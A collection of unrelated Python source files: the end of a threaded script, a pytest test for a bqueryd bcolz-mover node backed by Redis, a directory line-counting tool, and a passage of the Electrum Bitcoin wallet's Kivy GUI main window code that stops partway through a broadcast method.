# for lamp in lamps:
# lamp.deinit()
loop.quit()
worker_thread.join()
if __name__ == "__main__":
main()
|
test_movebcolz.py
|
import logging
import os
import numpy as np
import pandas as pd
import pytest
import redis
import shutil
import socket
import threading
import time
from bquery import ctable
from time import sleep
from uuid import uuid4
import bqueryd
TEST_REDIS = 'redis://redis:6379/0'
@pytest.fixture
def redis_server():
"""
Return a Redis Client connected to local (test) redis.
Remove all keys from REDIS before and after use.
"""
redis_server = redis.from_url(TEST_REDIS)
redis_server.flushdb()
yield redis_server
redis_server.flushdb()
@pytest.fixture
def clear_dirs():
if os.path.isdir(bqueryd.INCOMING):
shutil.rmtree(bqueryd.INCOMING)
if os.path.isdir(bqueryd.DEFAULT_DATA_DIR):
shutil.rmtree(bqueryd.DEFAULT_DATA_DIR)
@pytest.fixture
def mover():
mover = bqueryd.MoveBcolzNode(redis_url=TEST_REDIS, loglevel=logging.DEBUG)
mover_thread = threading.Thread(target=mover.go)
mover_thread.daemon = True
mover_thread.start()
# Sleep 5 seconds, just to make sure all connections are properly established
sleep(5)
yield mover
# shutdown the thread
mover.running = False
@pytest.mark.usefixtures('clear_dirs')
@pytest.mark.usefixtures('mover')
def test_movebcolz(redis_server, tmpdir):
# Make a bcolz from a pandas DataFrame
data_df = pd.DataFrame(
data=np.random.rand(100, 10),
columns=['col_{}'.format(i+1) for i in range(10)])
local_bcolz = str(tmpdir.join('test_mover.bcolz'))
ctable.fromdataframe(data_df, rootdir=local_bcolz)
assert os.path.isdir(local_bcolz)
# copy the bcolz directory to bqueyd.INCOMING
ticket = str(uuid4())
ticket_dir = os.path.join(bqueryd.INCOMING, ticket, 'test_mover.bcolz')
shutil.copytree(local_bcolz, ticket_dir)
# Construct the redis entry that before downloading
progress_slot = '%s_%s' % (time.time() - 60, -1)
node_filename_slot = '%s_%s' % (socket.gethostname(), 's3://bcolz/test_mover.bcolz')
redis_server.hset(bqueryd.REDIS_TICKET_KEY_PREFIX + ticket, node_filename_slot, progress_slot)
# wait for some time
sleep(5)
# At this stage, we don't expect the bcolz directory to be moved to bqueryd.DEFAULT_DATA_DIR, because the progress
# slot has not been updated yet
files_in_default_data_dir = os.listdir(bqueryd.DEFAULT_DATA_DIR)
files_in_default_data_dir.sort()
assert files_in_default_data_dir == ['incoming']
# ticket_dir still exists
assert os.path.isdir(ticket_dir)
# Now update progress slot
new_progress_slot = '%s_%s' % (time.time(), 'DONE')
redis_server.hset(bqueryd.REDIS_TICKET_KEY_PREFIX + ticket, node_filename_slot, new_progress_slot)
# Sleep again
sleep(5)
files_in_default_data_dir = os.listdir(bqueryd.DEFAULT_DATA_DIR)
files_in_default_data_dir.sort()
assert files_in_default_data_dir == ['incoming', 'test_mover.bcolz']
# ticket_dir should have been deleted.
assert not os.path.exists(ticket_dir)
if __name__ == '__main__':
pytest.main([__file__, '-v', '-s'])
|
clines.py
|
import pathlib
import os
import threading
from lib.progressbar import progressbar
import colorama
import time
import sys
total_amount_of_lines = 0
total_amount_of_nonempty_lines = 0
def summary_and_quit():
print(f"\n\n Summary: {total_amount_of_lines} line(s)\n {total_amount_of_nonempty_lines} nonempty line(s)\n\n")
progressbar.stop()
sys.exit()
def clines():
global total_amount_of_lines, total_amount_of_nonempty_lines
try:
colorama.init()
threading.Thread(target=progressbar.show).start()
time.sleep(0.5)
path = os.getcwd()
all_items = [item for item in os.listdir(path)]
folders = [f"{folder}/" for folder in all_items if pathlib.Path(folder).is_dir()]
files = [file for file in all_items if pathlib.Path(file).is_file()]
total_amount_of_files = len(all_items)
files_read = 0
filename_max_length = 30
name_gap = (2 + max([len(item) for item in all_items]))
if name_gap > filename_max_length:
name_gap = filename_max_length
directory = f"\n\n Directory: {path}\n\n"
title = f"Name{' ' * name_gap}Items/Lines NonemptyLines"
title_underline = f"----{' ' * name_gap}----------- -------------"
interrupted_text = " PROCESS INTERRUPTED "
# Get the position where to print the amount of lines
lines_text_location = title.find("Items/Lines") + len("Items/Lines")
print(directory)
print(title)
print(title_underline)
# Read folders --------------------------------------------------
for current_folder in folders:
foldername_to_print = current_folder
if len(foldername_to_print) > filename_max_length:
foldername_to_print = current_folder[:filename_max_length - 4] + ".../"
try:
progressbar.current_process = foldername_to_print
amount_of_subitems = len([subitem for subitem in os.listdir(f"{path}/{current_folder}")])
print(f"\033[33m📁\033[0m {foldername_to_print}{' ' * (lines_text_location - 3 - len(foldername_to_print) - len('Items/Lines'))}{amount_of_subitems}")
except PermissionError:
print(f"\033[33m📁\033[0m {foldername_to_print}{' ' * (lines_text_location - 3 - len(foldername_to_print) - len('Items/Lines'))}- \033[31mACCESS DENIED\033[0m")
except KeyboardInterrupt:
summary_and_quit()
finally:
files_read += 1
progressbar.loading_text = f"{files_read}/{total_amount_of_files}"
progressbar.overall_progress = (files_read / total_amount_of_files) * 100
# Read files ----------------------------------------------------
for current_file in files:
filename_to_print = current_file
if len(filename_to_print) > filename_max_length:
filename_to_print = filename_to_print[:filename_max_length - 3 - len(filename_to_print[(filename_to_print.rfind(".")):])] + "..." + filename_to_print[(filename_to_print.rfind(".")):]
try:
with open(current_file, "r", encoding="iso-8859-15") as file:
progressbar.current_progress = 0
# Update the progressbar "current file" text
progressbar.current_process = filename_to_print
lines = file.readlines()
total_lines = len(lines)
nonempty_lines = 0
current_line = 0
for line in lines:
if len(str(line).replace(" ", "").strip("\n")) > 0:
nonempty_lines += 1
current_line += 1
progressbar.current_progress = (current_line / total_lines) * 100
print(f"\033[36m📄\033[0m {filename_to_print}{' ' * (lines_text_location-(3+len(filename_to_print)+len(str(total_lines))))}{total_lines} {nonempty_lines}")
total_amount_of_lines += total_lines
total_amount_of_nonempty_lines += nonempty_lines
file.close()
except PermissionError:
print(f"\033[36m📄\033[0m {filename_to_print}{' ' * (lines_text_location - (4 + len(filename_to_print)))}- - \033[31mACCESS DENIED\033[0m")
except KeyboardInterrupt:
print(f"\n\033[31m{'-' * int((len(title)/2)-(len(interrupted_text)/2))}{interrupted_text}{'-' * int((len(title)/2)-(len(interrupted_text)/2))}\033[0m")
summary_and_quit()
finally:
files_read += 1
progressbar.loading_text = f"{files_read}/{total_amount_of_files}"
progressbar.overall_progress = (files_read / total_amount_of_files) * 100
time.sleep(0.5)
summary_and_quit()
except KeyboardInterrupt:
progressbar.stop()
if __name__ == '__main__':
clines()
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
from electrum.bitcoin import TYPE_ADDRESS
from electrum.storage import WalletStorage
from electrum.wallet import Wallet
from electrum.paymentrequest import InvoiceStore
from electrum.util import profiler, InvalidPassword
from electrum.plugin import run_hook
from electrum.util import format_satoshis, format_satoshis_plain
from electrum.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
from .i18n import _
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# register widget cache for keeping memory down timeout to forever to cache
# the data
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum.gui.kivy.uix.screens')
# Register fonts without this you won't be able to use bold/italic...
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum.util import (base_units, NoDynamicFeeEstimates, decimal_point_to_base_unit_name,
base_unit_name_to_decimal_point, NotEnoughFunds)
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_forkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
host, port, protocol, proxy, auto_connect = self.network.get_parameters()
self.network.set_parameters(host, port, protocol, proxy, self.auto_connect)
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = 's'
def cb2(host):
from electrum import constants
pp = servers.get(host, constants.net.DEFAULT_PORTS)
port = pp.get(protocol, '')
popup.ids.host.text = host
popup.ids.port.text = port
servers = self.network.get_servers()
ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
for index, b in self.network.blockchains.items():
if name == b.get_name():
self.network.follow_chain(index)
names = [self.network.blockchains[b].get_name() for b in chains]
if len(names) > 1:
cur_chain = self.network.blockchain().get_name()
ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
self.electrum_config.set_key('use_change', self.use_change, True)
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def on_new_intent(self, intent):
if intent.getScheme() != 'bitcoin':
return
uri = intent.getDataString()
self.set_URI(uri)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
self._trigger_update_history()
def on_fee_histogram(self, *args):
self._trigger_update_history()
def _get_bu(self):
decimal_point = self.electrum_config.get('decimal_point', 5)
return decimal_point_to_base_unit_name(decimal_point)
def _set_bu(self, value):
assert value in base_units.keys()
decimal_point = base_unit_name_to_decimal_point(value)
self.electrum_config.set_key('decimal_point', decimal_point, True)
self._trigger_update_status()
self._trigger_update_history()
base_unit = AliasProperty(_get_bu, _set_bu)
status = StringProperty('')
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`orientation` is a read only `AliasProperty` Defaults to 'landscape'
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Defines tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`ui_mode` is a read only `AliasProperty` Defaults to 'phone'
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None
self.pause_time = 0
App.__init__(self)#, **kwargs)
title = _('Electrum App')
self.electrum_config = config = kwargs.get('config', None)
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None)
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
host, port, protocol, proxy_config, auto_connect = self.network.get_parameters()
self.server_host = host
self.server_port = port
self.auto_connect = auto_connect
self.proxy_config = proxy_config if proxy_config else {}
self.plugins = kwargs.get('plugins', [])
self.gui_object = kwargs.get('gui_object', None)
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_change = config.get('use_change', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updating a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
# cached dialogs
self._settings_dialog = None
self._password_dialog = None
self.fee_status = self.electrum_config.get_fee_status()
def wallet_name(self):
return os.path.basename(self.wallet.storage.path) if self.wallet else ' '
def on_pr(self, pr):
if not self.wallet:
self.show_error(_('No wallet loaded.'))
return
if pr.verify(self.wallet.contacts):
key = self.wallet.invoices.add(pr)
if self.invoices_screen:
self.invoices_screen.update()
status = self.wallet.invoices.get_status(key)
if status == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
else:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum.bitcoin import base_decode, is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('bitcoin:'):
self.set_URI(data)
return
# try to decode transaction
from electrum.transaction import Transaction
from electrum.util import bh2u
try:
text = bh2u(base_decode(data, None, base=43))
tx = Transaction(text)
tx.deserialize()
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
if s is None:
s = self.tabs.ids[name + '_screen']
s.load_screen()
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, addr):
self.switch_to('receive')
self.receive_screen.screen.address = addr
def show_pr_details(self, req, status, is_invoice):
from electrum.util import format_time
requestor = req.get('requestor')
exp = req.get('exp')
memo = req.get('memo')
amount = req.get('amount')
fund = req.get('fund')
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/invoice.kv')
popup.is_invoice = is_invoice
popup.amount = amount
popup.requestor = requestor if is_invoice else req.get('address')
popup.exp = format_time(exp) if exp else ''
popup.description = memo if memo else ''
popup.signature = req.get('signature', '')
popup.status = status
popup.fund = fund if fund else 0
txid = req.get('txid')
popup.tx_hash = txid or ''
popup.on_open = lambda: popup.ids.output_list.update(req.get('outputs', []))
popup.export = self.export_private_keys
popup.open()
def show_addr_details(self, req, status):
from electrum.util import format_time
fund = req.get('fund')
isaddr = 'y'
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/invoice.kv')
popup.isaddr = isaddr
popup.is_invoice = False
popup.status = status
popup.requestor = req.get('address')
popup.fund = fund if fund else 0
popup.export = self.export_private_keys
popup.open()
def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None):
from .uix.dialogs.qr_dialog import QRDialog
def on_qr_failure():
popup.dismiss()
msg = _('Failed to display QR code.')
if text_for_clipboard:
msg += '\n' + _('Text copied to clipboard.')
self._clipboard.copy(text_for_clipboard)
Clock.schedule_once(lambda dt: self.show_info(msg))
popup = QRDialog(title, data, show_text, on_qr_failure)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('electrum/gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
Logger.info('Time to on_start: {} <<<<<<<<'.format(time.clock()))
win = Window
win.bind(size=self.on_size, on_keyboard=self.on_keyboard)
win.bind(on_key_down=self.on_key_down)
#win.softinput_mode = 'below_target'
self.on_size(win, win.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitcoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['updated', 'status', 'new_transaction', 'verified', 'interfaces']
self.network.register_callback(self.on_network_event, interests)
self.network.register_callback(self.on_fee, ['fee'])
self.network.register_callback(self.on_fee_histogram, ['fee_histogram'])
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path())
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, wizard, wallet):
if wallet: # wizard returned a wallet
wallet.start_threads(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
elif not self.wallet:
# wizard did not return a wallet; and there is no wallet open atm
# try to open last saved wallet (potentially start wizard again)
self.load_wallet_by_name(self.electrum_config.get_wallet_path(), ask_if_wizard=True)
def load_wallet_by_name(self, path, ask_if_wizard=False):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if wallet.has_password():
self.password_dialog(wallet, _('Enter PIN code'), lambda x: self.load_wallet(wallet), self.stop)
else:
self.load_wallet(wallet)
else:
Logger.debug('Electrum: Wallet not found or action needed. Launching install wizard')
def launch_wizard():
storage = WalletStorage(path, manual_upgrades=True)
wizard = Factory.InstallWizard(self.electrum_config, self.plugins, storage)
wizard.bind(on_wizard_complete=self.on_wizard_complete)
action = wizard.storage.get_action()
wizard.run(action)
if not ask_if_wizard:
launch_wizard()
else:
from .uix.dialogs.question import Question
def handle_answer(b: bool):
if b:
launch_wizard()
else:
try: os.unlink(path)
except FileNotFoundError: pass
self.stop()
d = Question(_('Do you want to launch the wizard again?'), handle_answer)
d.open()
def on_stop(self):
Logger.info('on_stop')
if self.wallet:
self.electrum_config.save_last_wallet(self.wallet)
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
from .uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.open()
elif name == 'status':
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
else:
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize The Ux part of electrum. This function performs the basic
tasks of setting up the ui.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "icons/electrum.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_forkpoint = chain.get_forkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'interfaces':
self._trigger_update_interfaces()
elif event == 'updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
def update_status(self, *dt):
self.num_blocks = self.network.get_local_height()
if not self.wallet:
self.status = _("No Wallet")
return
if self.network is None or not self.network.is_running():
status = _("Offline")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
if not self.wallet.up_to_date or server_height == 0:
status = _("Synchronizing...")
elif server_lag > 1:
status = _("Server lagging")
else:
status = ''
else:
status = _("Disconnected")
self.status = self.wallet.basename() + (' [size=15dp](%s)[/size]'%status if status else '')
# balance
c, u, x = self.wallet.get_balance()
text = self.format_amount(c+x+u)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(c+u+x) + ' [size=22dp]%s[/size]'% self.fx.ccy
def get_max_amount(self):
from electrum.transaction import TxOutput
if run_hook('abort_send', self):
return ''
inputs = self.wallet.get_spendable_coins(None, self.electrum_config)
if not inputs:
return ''
addr = str(self.send_screen.screen.address) or self.wallet.dummy_address()
outputs = [TxOutput(TYPE_ADDRESS, addr, '!')]
try:
tx = self.wallet.make_unsigned_transaction(inputs, outputs, self.electrum_config)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
return ''
except NotEnoughFunds:
return ''
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, 0, self.decimal_point(), is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum', message,
app_icon=icon, app_name='Electrum')
except ImportError:
Logger.Error('Notification: needs plyer; `sudo pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
now = time.time()
if self.wallet and self.wallet.has_password() and now - self.pause_time > 60:
self.password_dialog(self.wallet, _('Enter PIN'), None, self.stop)
if self.nfcscanner:
self.nfcscanner.nfc_enable()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, touch):
if label.touched:
label.touched = False
self.qr_dialog(label.name, label.data, True)
else:
label.touched = True
self._clipboard.copy(label.data)
Clock.schedule_once(lambda dt: self.show_info(_('Text copied to clipboard.\nTap again to display it as QR code.')))
def set_send(self, address, amount, label, message):
self.send_payment(address, amount=amount, label=label, message=message)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://electrum/gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon='atlas://electrum/gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://electrum/gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
ok, txid = self.network.broadcast_transaction(tx)
Clock.schedule_once(lambda dt: on_complete(ok, txid))
def broadcast(self, tx, pr=None):
